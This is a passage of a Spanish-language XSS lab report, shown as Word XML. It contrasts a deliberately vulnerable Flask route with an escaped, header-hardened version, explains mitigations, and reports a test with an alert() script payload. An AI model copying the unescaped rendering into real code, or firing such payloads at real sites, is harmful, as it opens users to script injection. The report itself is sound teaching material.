        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route('/vulnerable')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">def vulnerable():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = request.args.get('q', '')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # El input se inserta directamente en la plantilla HTML sin escapar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return render_template_string(TEMPLATE, query_raw=query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># En la plantilla Jinja2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Resultados para: {{ query_raw }}  ← Jinja escapa automáticamente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># PERO si se usa | safe o render_template_string con variable directa: vulnerable</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4.2 Código seguro (ruta /seguro)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La versión mitigada aplica escape() de markupsafe y headers de seguridad HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ SEGURO — app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">from markupsafe import escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route('/seguro')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">def seguro():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    raw = request.args.get('q', '')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    safe = str(escape(raw))  # Convierte &lt; &gt; " ' &amp; en entidades HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    resp = make_response(render_template_string(TEMPLATE, query_safe=safe))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    resp.headers['Content-Security-Policy'] = "default-src 'self'"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    resp.headers['X-XSS-Protection'] = '1; mode=block'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    resp.headers['X-Content-Type-Options'] = 'nosniff'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return resp</w:t>
      </w:r>
    </w:p>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5. Técnicas de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Sanitización y escape de output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La técnica más efectiva es escapar todos los datos proporcionados por el usuario antes de incluirlos en el HTML. El escape convierte caracteres especiales en entidades HTML inofensivas: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286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Carácter</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Entidad HTML</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 qué es peligroso</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Después del escape</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&amp;lt;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Abre tags HTML/script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 muestra como texto</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&amp;gt;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Cierra tags HTML/script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 muestra como texto</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&amp;quot;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Cierra atributos HTML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 muestra como texto</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&amp;#039;</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Cierra atributos con comilla simple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 muestra como texto</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&amp;amp;</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Inicia entidades HTML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 muestra como texto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Content-Security-Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El header CSP instruye al navegador sobre las fuentes de contenido permitidas. Con una política restrictiva, incluso si un atacante logra inyectar un script, el navegador lo bloqueará.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Política restrictiva recomendada:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Desglose de directivas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">default-src 'self' — Solo permite recursos del mismo origen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src 'self' — Bloquea scripts inline y de orígenes externos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">object-src 'none' — Deshabilita Flash y objetos embebidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">base-uri 'self' — Previene ataques de base tag injection</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5.3 Cookies HttpOnly y Secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La mayoría de los ataques XSS tienen como objetivo robar la cookie de sesión. El flag HttpOnly impide que JavaScript acceda a las cookies, neutralizando este vector de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Flask — configuración de cookies seguras</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">app.config['SESSION_COOKIE_HTTPONLY'] = True   # JS no puede leer la cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">app.config['SESSION_COOKIE_SECURE'] = True     # Solo se envía por HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' # Previene CSRF</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5.4 Validación en el servidor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nunca confiar en validaciones del lado cliente. Todas las entradas deben validarse en el backend usando expresiones regulares o listas de valores permitidos (whitelist).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">def es_input_valido(texto, patron=r'^[a-zA-Z0-9 .,!?áéíóúÁÉÍÓÚñÑ-]{1,200}$'):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return bool(re.match(patron, texto))</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5.5 textContent en lugar de innerHTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Para el XSS basado en DOM, la solución es usar APIs del DOM que no interpretan HTML:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// ❌ VULNERABLE — interpreta HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">elemento.innerHTML = datosUsuario;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ SEGURO — trata el valor como texto plano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="264F78"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">elemento.textContent = datosUsuario;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Técnica</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Protege contra</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Implementación en Flask/JS</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escape() / markupsafe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XSS Reflejado y Almacenado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from markupsafe import escape</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Content-Security-Policy</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Todos los tipos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resp.headers['CSP'] = ...</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HttpOnly Cookies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Robo de sesión vía XSS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SESSION_COOKIE_HTTPONLY = True</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Validación whitelist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Entrada maliciosa</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re.match(patron, input)</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textContent vs innerHTML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XSS DOM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elem.textContent = data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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6. Resultados obtenidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Durante el desarrollo y ejecución de la práctica se obtuvieron los siguientes resultados:</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6.1 XSS Reflejado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se accedió a la ruta /vulnerable con el payload &lt;script&gt;alert('XSS Reflejado')&lt;/script&gt; como parámetro GET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor insertó el payload directamente en el HTML sin sanitización.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El navegador ejecutó el script, mostrando el cuadro de alerta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se verificó la misma prueba en /seguro, donde el payload fue escapado y mostrado como texto plano inofensivo.</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6.2 XSS Almacenado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
